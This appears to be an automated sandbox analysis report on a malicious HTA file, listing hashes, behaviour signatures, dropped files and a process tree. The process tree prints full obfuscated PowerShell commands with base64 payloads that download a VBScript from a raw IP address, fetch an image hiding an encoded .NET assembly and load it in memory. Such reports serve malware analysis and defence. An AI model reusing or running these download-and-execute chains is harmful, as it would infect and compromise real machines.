Analysis

  • max time kernel
    13s
  • max time network
    19s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    05-02-2025 03:47

General

  • Target

    5e4a54ebcde1ef6692e7a44b42ee370999babef758cc42b54d09138628e4afe1.hta

  • Size

    14KB

  • MD5

    938e35be516181974704aa4670095460

  • SHA1

    754242d1bf355648fbd2391736af51cc6b3d14c3

  • SHA256

    5e4a54ebcde1ef6692e7a44b42ee370999babef758cc42b54d09138628e4afe1

  • SHA512

    7cbdd534e019a0cddc385b962b9bdfccd6da760236f7b1687ace056479025269b60fccb10bc20de346f748d42f514c8d0695658dda75212ef076a267c49e9baf

  • SSDEEP

    96:NAT+4S9AT74SMuVNUtCPAT3ATJO4S7ATg:N4Q94V+CP434G74g

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Evasion via Device Credential Deployment 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\5e4a54ebcde1ef6692e7a44b42ee370999babef758cc42b54d09138628e4afe1.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2808
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C PoWersHeLl.EXE -EX bYpAsS -NOp -w 1 -c DeviCEcREdENtiAlDeplOYMENT.ExE ; IeX($(ieX('[SYsTem.teXt.EnCOding]'+[cHar]58+[cHAR]58+'UTF8.GeTSTriNG([SYSTEM.cOnVErt]'+[chAr]58+[cHar]58+'FRomBASE64StRIng('+[chAr]0X22+'JDFKbDYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZGVGaW5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Umxtb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGlaVWx5SHdzZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWFZXaFMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ09Pa29aaWZLRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUpvc1ZHcGMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmhRWUliKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAid2RNaGVCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FU1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBd3N0bW9UWWdNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxSmw2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjE3LjE2MC4xNjMuMTEzLzY2OS9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2RhbmRncmVhdG5lc3N0aGluZ3NlbnRpcmV0aW1lZm9yLmdJRiIsIiRlbnY6QVBQREFUQVxzZWV0aGViZXN0dGhpbmdzd2l0aGdvb2RhbmRncmVhdG5lc3N0aGluZ3NlbnRpcmV0aW1lLnZicyIsMCwwKTtzdGFydC1TTGVlUCgzKTtJTlZPS0UtaXRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kYW5kZ3JlYXRuZXNzdGhpbmdzZW50aXJldGltZS52YnMi'+[chAR]34+'))')))"
      2⤵
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2864
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        PoWersHeLl.EXE -EX bYpAsS -NOp -w 1 -c DeviCEcREdENtiAlDeplOYMENT.ExE ; IeX($(ieX('[SYsTem.teXt.EnCOding]'+[cHar]58+[cHAR]58+'UTF8.GeTSTriNG([SYSTEM.cOnVErt]'+[chAr]58+[cHar]58+'FRomBASE64StRIng('+[chAr]0X22+'JDFKbDYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZGVGaW5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Umxtb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGlaVWx5SHdzZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWFZXaFMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ09Pa29aaWZLRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUpvc1ZHcGMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmhRWUliKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAid2RNaGVCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FU1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBd3N0bW9UWWdNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxSmw2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjE3LjE2MC4xNjMuMTEzLzY2OS9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2RhbmRncmVhdG5lc3N0aGluZ3NlbnRpcmV0aW1lZm9yLmdJRiIsIiRlbnY6QVBQREFUQVxzZWV0aGViZXN0dGhpbmdzd2l0aGdvb2RhbmRncmVhdG5lc3N0aGluZ3NlbnRpcmV0aW1lLnZicyIsMCwwKTtzdGFydC1TTGVlUCgzKTtJTlZPS0UtaXRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kYW5kZ3JlYXRuZXNzdGhpbmdzZW50aXJldGltZS52YnMi'+[chAR]34+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3008
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ybfycj4c.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2896
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D5.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6D4.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3000
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswithgoodandgreatnessthingsentiretime.vbs"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1576
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AcwBnAG4AaQBoAGcAbgBpAGsAbgBpAGgAdAB0AHMAZQBiAGgAdABpAHcAbgBvAGcAbgBpAG8AZwBzAHkAYQB3AGwAYQBzAGcAbgBpAGgAdAB0AHMAZQBiAC8AOQA2ADYALwAzADEAMQAuADMANgAxAC4AMAA2ADEALgA3ADEAMgAvAC8AOgBwAHQAdABoACcAOwAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACAAPQAgACQAbwByAGkAZwBpAG4AYQBsAFQAZQB4AHQAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGkAbQBhAGcAZQBVAHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAcwAuAGMAbABvAHUAZABpAG4AYQByAHkALgBjAG8AbQAvAGQAYQB4AHcAdQBhADYAMwB5AC8AaQBtAGEAZwBlAC8AdQBwAGwAbwBhAGQALwB2ADEANwAzADgAMwAzADQANQAzADMALwBhAGwAYwBiADQAaAB0AG8AbAB6AHYAZgBoAHoAegB1AGYAcQBoADUALgBqAHAAZwAnADsAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAaQBtAGEAZwBlAFUAcgBsACkAOwAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwAkAHQAeQBwAGUAIAA9ACAAWwBDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAxAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAG0AYQBpAG4AJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAsACcAZgBhAGwAcwBlACcALAAnAEMAYQBzAFAAbwBsACcALAAnAGYAYQBsAHMAZQAnACkAKQA=')) | Invoke-Expression"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:752

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Cab2406.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RES6D5.tmp

    Filesize

    1KB

    MD5

    2ec854afdbf72c624a9ebe9c14c03fb0

    SHA1

    3c319a2cd5a858c8d330af62d6d869882ee8ee8c

    SHA256

    861e3553592fe342d3ef09b593c557b926c299cf006551889bf2e52e2b7c24d6

    SHA512

    8654bdce363795fe73d665250b55e0afc0848bfebb002f33d80643d7f52bc782aa99f6b16fcc007d58fb84c5702443157d7881407c468e33d23effe33456f4fd

  • C:\Users\Admin\AppData\Local\Temp\Tar2496.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Local\Temp\ybfycj4c.dll

    Filesize

    3KB

    MD5

    1ea1d7b8f7b74c43b271084799137140

    SHA1

    c51e2523a7a58bd3f566d0e2e7625b9d29961837

    SHA256

    c0310c8ecd4834b4b90d9ddc4d2ad375ee9c81ed6aefbe7e2bfd85d4d5e2424f

    SHA512

    53303a40f5d299272046131e8f6eaef3d0f3e23e7403f91ecf3d23530f471f8554fc3f2338af31461d0534aee7c7132fa51fae5b46901d00ca3e92e6ff34a813

  • C:\Users\Admin\AppData\Local\Temp\ybfycj4c.pdb

    Filesize

    7KB

    MD5

    51f540bb4c452ca85c58a7a1fcb7ffa0

    SHA1

    dcdadede87ad96abe2b578f9bd987b885d71107c

    SHA256

    ff70350596031c3ec0f7fc026a9cb310d7ed99b2c7e13f7396157843d4bba5c5

    SHA512

    0af9352a35b0d2ea0b19c5792aa4557b536dd7a0bf1a57348c16d93957046215843e6c30152589510c0e76bf6eb2c52deed2432551d34f5a5dbe2a5e6c3d9e18

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    4ee9705bada84d6e979b9aaedeb8ea96

    SHA1

    f0c66014b0de8bbdb0dc61e7d94261c703f5d22a

    SHA256

    af655f017ac491c4a3e1b9d43bd86dceec6c0a222388d2994f329f6fdfcae3ca

    SHA512

    4f487a3bc65f5defc24d7201f053f9cdb2356f02bd32fd26954deaf10c0d0e4285a3b7da82e548e795f8569fdb8d01aa811d0366f873d21dd38ba19829f417fc

  • C:\Users\Admin\AppData\Roaming\seethebestthingswithgoodandgreatnessthingsentiretime.vbs

    Filesize

    229KB

    MD5

    84cee61b12d317192efd143b48e3e9a8

    SHA1

    4a9bc4873ad6ca101f6802da2dbd5add3c0b4914

    SHA256

    77ac7ada2e64beee29a7e5d2f73280d49a0ed825e8a97f15bc0719a558d3c695

    SHA512

    983e5ddd6e7cf3803c0dd64c7d8ca381d56755c2529cca96659c183ec2fd1839c659634beb420a706083417091d420573ee61c3bca797fd1d97d768713e7c63e

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC6D4.tmp

    Filesize

    652B

    MD5

    4c0cea963f73862939327ef68ca37c24

    SHA1

    97e9f075547254cd31667e0bf3645397d04f3d25

    SHA256

    072ce4dd53b4af226c0a5c2751b0342e5e1a7af03107f052914fc8503a148449

    SHA512

    5291cf6fab0d36b91f9ae27788f4f48f25294afe349bbb9e7223bae16961edaf644520101392c2dfa628148a1ffd0f9b5dadceaa56a38512cd6289dae09695d5

  • \??\c:\Users\Admin\AppData\Local\Temp\ybfycj4c.0.cs

    Filesize

    493B

    MD5

    6c7f5f6019ccbb0a40a74f81a393e073

    SHA1

    8e888a89826da91fea21a64fc13e39bb1daa6d5b

    SHA256

    dbb24f29108f30b087c8e06d36c4b55929e5dc412c048b8b4ba867cfed2a3b42

    SHA512

    0692e922d4a2e553752665313f8894ceaefad68ba43172db67e3e26a6f020a5824416f855933fba935c388b034794097c0f62edd2dc15dee355ce8b50b32fac9

  • \??\c:\Users\Admin\AppData\Local\Temp\ybfycj4c.cmdline

    Filesize

    309B

    MD5

    06872182e8344d3df81cc854d571952b

    SHA1

    948c2f9e6df61acdb11d5bc995d73756b94fab25

    SHA256

    b7332fe893cbae6f0d34ffd62b3c6dceaaea5a0d1f2cc36fbda2565c0f97fc6d

    SHA512

    0f6d81a37d6e35fdbd4ed2f59edcd7d970c201c70247ef47a7e258084181170ce071e1629bc54009e9f219291f03fa8417ebbe0fe3af762c3160e1fb6b22a82a